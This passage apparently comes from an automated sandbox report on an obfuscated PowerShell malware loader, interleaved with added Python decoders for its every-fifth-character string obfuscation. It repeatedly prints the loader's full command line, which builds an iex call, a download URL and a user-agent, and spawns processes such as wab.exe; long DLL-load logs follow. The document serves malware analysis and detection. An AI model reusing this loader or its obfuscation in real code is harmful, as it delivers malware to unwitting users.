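# lost non-ASCII filler characters, so alignment drifts beyond this prefix.
ANTONINAS_PREFIX = "DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc "

# Constructed command line in the loader's style; the helper name is kept, the URL is invented.
SAMPLE_CMDLINE = (
    "$Eksperter=Antikvitetsforretnings '" + PAGE_LITERALS["$Eksperter"] + "';"
    "$Torumslejligheds=Antikvitetsforretnings '" + PAGE_LITERALS["$Torumslejligheds"] + "';"
    "$Url=Antikvitetsforretnings '" + obfuscate("https://example.invalid/payload.bin") + "';"
)

if __name__ == "__main__":
    for name, blob in PAGE_LITERALS.items():
        print(f"{name} -> {deobfuscate(blob)!r}")
    print(f"$Antoninas prefix -> {deobfuscate(ANTONINAS_PREFIX)!r}")
    print(decode_literals(SAMPLE_CMDLINE, "Antikvitetsforretnings"))
```

Feed `decode_literals` the full command line taken from a Sysmon event 1 record or the sandbox's raw process tree rather than from an HTML rendering, so the non-ASCII filler survives and the long literals line up.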
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exe | Process created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"
Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: unknown | Process created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
Source: unknown | Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Windows\SysWOW64\clip.exe | Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.too] ,is:Paam: SupS St ePanJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"Jump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners Decisionen Landbrugsmssiges Sapremia157 Tandemcykels nucleli Isopropenyl Albatroserne Granden Udbredes Fluesnapperen Sideloebende Ernestines Karakterbristernes Unprejudice Udsigelsen Moonward Hovedbanegaarde Fremskridtsbyerne Sildigste Readaptable Rendyrkede Opprobriated Protococcal Hjlpefunktioners';If (${host}.CurrentCulture) {$Cabalismsbryderens++;}Function Antikvitetsforretnings($Rodfunktionerne){$Byggeforetagenders156=$Rodfunktionerne.Length-$Cabalismsbryderens;$Sinecural='SUBsTR';$Sinecural+='ing';For( $Cabalism=4;$Cabalism -lt $Byggeforetagenders156;$Cabalism+=5){$Decisionen+=$Rodfunktionerne.$Sinecural.Invoke( $Cabalism, $Cabalismsbryderens);}$Decisionen;}function Unthrust($Meagrely){ . ($Eksperter) ($Meagrely);}$Antoninas=Antikvitetsforretnings 'DittMCineofutizantiisammlCarblMorpaudny/Illi5fa g.Chec0Subc .ul(UbehW Ae,istrinConvd HanoFr kwNyvlsDiat EmbrNTocoT Gli Conv1 ,dd0Klip.Sena0Bald; S h ForeWR,triRe,ongenn6S,ol4 Opt;.avi Strx,erm6Mod,4Stal; Far BaglrOstevSla,:Inqi1akti2 Fed1.mrk. 
g,t0,esk)Kamg DebGNatie,atrcskank Rono reh/Vrts2 aft0Komp1 Jrv0ort.0.ini1atla0Ek,k1,nth UdliFTizwiCadirAlomeGenaf,oreoegesxA,at/Omr.1ma,d2Vol 1 Unr.Fort0Home ';$Torumslejligheds=Antikvitetsforretnings 'BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ';$nucleli=Antikvitetsforretnings 'Fa,ah nkatDe otFe.lp,borsInhi:No p/Spek/AageeBuescSidsoPsyknOnd,s CuttNipsr EriaResem.tyreHybrdFeroi aanaOve .denacJagaoNondm Ku /UndeT.ncoe.ortgOut,lSinubHvalrClavnHilldEmpoe OddrEnkeiFanteDelerSail.FervsScrinS enpC re ';$Udarte=Antikvitetsforretnings 'Hytt>Sony ';$Eksperter=Antikvitetsforretnings 'GuttiVirke,trexScor ';$Arabin='Granden';$Martinetishness = Antikvitetsforretnings 'Vande H.wcAabehroeroUdtr Dec%S,lda B,upReg,pOv,rd Ek.aProvtD.coaDung%Cavi\,uviCkontoPreduKonsm niaAut rA bea F rtUnheeWelf. autBBe.aiD bbcAl m Sta&Mask& ual heale Ti.c Pl,hVippo Biv SynttL uc ';Unthrust (Antikvitetsforretnings 'Maxi$Em,og .ncl B ioH.rsbSlutaIntel Pol:It,mM,opeeDru.tBegialendl OstiTeltsSkrumSwad= Oms(Reloc.sonmAntedFore Sage/EmbacZibe Efte$DeprMP,ntaUdfrrB,sittissiZircnTu.sePosstSkovi sa sMasshU.banDesiePertsHimmsOver)brne ');Unthrust (Antikvitetsforretnings 'Un t$PopugOdiolNylooH,peb umpabgeblNucl:CranTConca VannO.ttdTo,seOpdrmAp,rcAnisy.etvkUnroeFamilL.ngsG st=,erv$S udnIndsulikvcFriglSatseBastlJakoiIsot. ConsUninpSa.vl hiciAnsttbort( Jer$ nopUCystdAnglaHerirRelit dukeDisp).run ');Unthrust (Antikvitetsforretnings ' ret[D,osNRecre PemtFarb.EnmeS,aboeKlynrVi,tvIkeyiudsvcPremeP ckPUniooDespiBrevnScletK nsM SieaRe snHjemaNonvgKlaseAfter.tooJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Coumarate.Bic && echo t"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
          Source: C:\Program Files (x86)\HeHjpTsbvMhcfzoSURKYptoUffHVwFBWZFtvEJtjRJXOVhlbNqiefiO\nPzDKsDmTWqJ.exeProcess created: C:\Windows\SysWOW64\clip.exe "C:\Windows\SysWOW64\clip.exe"Jump to behavior
          Source: C:\Windows\SysWOW64\clip.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
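          The PowerShell stage in the process-creation rows above hides every literal behind Antikvitetsforretnings, which keeps one character out of every five (indexes 4, 9, 14, ...) and stops one character short of the end, so every obfuscated literal carries a throwaway five-character tail. $Cabalismsbryderens is never assigned, so it is 0 until the `If (${host}.CurrentCulture)` check increments it to 1; that value is the Substring width, so in a host without a current culture every literal decodes to an empty string and the script does nothing. Unthrust dot-sources the result of $Eksperter, which decodes to iex. The decoder below is an added example, not code from the report or from the sample; the encode helper and its seeded junk characters are constructed here only for the round-trip check. The three short literals are quoted from the command line above; longer ones that contain runs of spaces do not decode cleanly from the report page because the rendering collapses whitespace, so feed those from the raw sample instead.

```python
"""Decoder for the every-fifth-character string obfuscation used by the
PowerShell stage above.  Added example, not code from the report or the
sample; helper names, the encode() inverse and the seeded junk are
constructed for illustration.

The script's Antikvitetsforretnings function is equivalent to:

    For ($i = 4; $i -lt $s.Length - $w; $i += 5) { $out += $s.Substring($i, $w) }

with $w ($Cabalismsbryderens) equal to 1 once ${host}.CurrentCulture is truthy.
"""
import random
import string

START, STEP = 4, 5  # as in the sample: first real character at index 4, stride 5


def decode(obfuscated: str, width: int = 1, start: int = START, step: int = STEP) -> str:
    """Mirror the Substring loop exactly, including the `len - width` bound that
    drops the final group.  width=0 reproduces the no-culture case: empty output."""
    out = []
    i = start
    while i < len(obfuscated) - width:
        out.append(obfuscated[i:i + width])
        i += step
    return "".join(out)


def encode(plain: str, rng: random.Random, step: int = STEP) -> str:
    """Inverse of decode, used only to build test input: (step-1) junk characters
    before each real character, plus one junk group at the end so the loop bound
    never swallows a real character."""
    alphabet = string.ascii_letters + " ,."

    def junk(n: int) -> str:
        return "".join(rng.choice(alphabet) for _ in range(n))

    return "".join(junk(step - 1) + ch for ch in plain) + junk(step)


def roundtrip_ok(plain: str, seed: int = 7) -> bool:
    """encode then decode must give the original text back."""
    return decode(encode(plain, random.Random(seed))) == plain


# Literals quoted verbatim from the command line in the report.
SAMPLE_LITERALS = {
    "$Udarte": "Hytt>Sony ",
    "$Eksperter": "GuttiVirke,trexScor ",
    "$Torumslejligheds": "BigwU Py,sBabbeVarmrDisp-ForeA LaggLutheLysenO.detEl,n ",
}


def decode_samples() -> dict:
    """Decode each quoted literal; the result is what the script actually uses."""
    return {name: decode(s) for name, s in SAMPLE_LITERALS.items()}


if __name__ == "__main__":
    for name, value in decode_samples().items():
        print(f"{name} = {value!r}")
    # Constructed plaintext: the cmd.exe line the second stage spawns, per the report.
    print("round trip ok:", roundtrip_ok(r"echo %appdata%\Coumarate.Bic && echo t"))
```

          The same loop with width set to 0 is the anti-analysis branch: nothing is decoded and no stage runs, which is one reason a sandbox without a configured culture would record a harmless script. For strings with double spaces, copy them from the original .bat rather than from this page.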
          Source: C:\Windows\System32\cmd.exe Section loaded: cmdext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appresolver.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: bcp47langs.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: slc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sppc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: linkinfo.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntshrui.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cscapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: policymanager.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msvcp110_win.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: taskflowdataengine.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wintypes.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cdp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: umpdc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dsreg.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: onecorecommonproxystub.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: napinsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: pnrpnsp.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshbth.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: nlaapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: winrnr.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wininet.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iertutil.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: sspicli.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: windows.storage.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: wldp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: profapi.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: kernel.appcore.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: ondemandconnroutehelper.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: winhttp.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: mswsock.dll
          Source: C:\Program Files (x86)\Windows Mail\wab.exe Section loaded: iphlpapi.dll
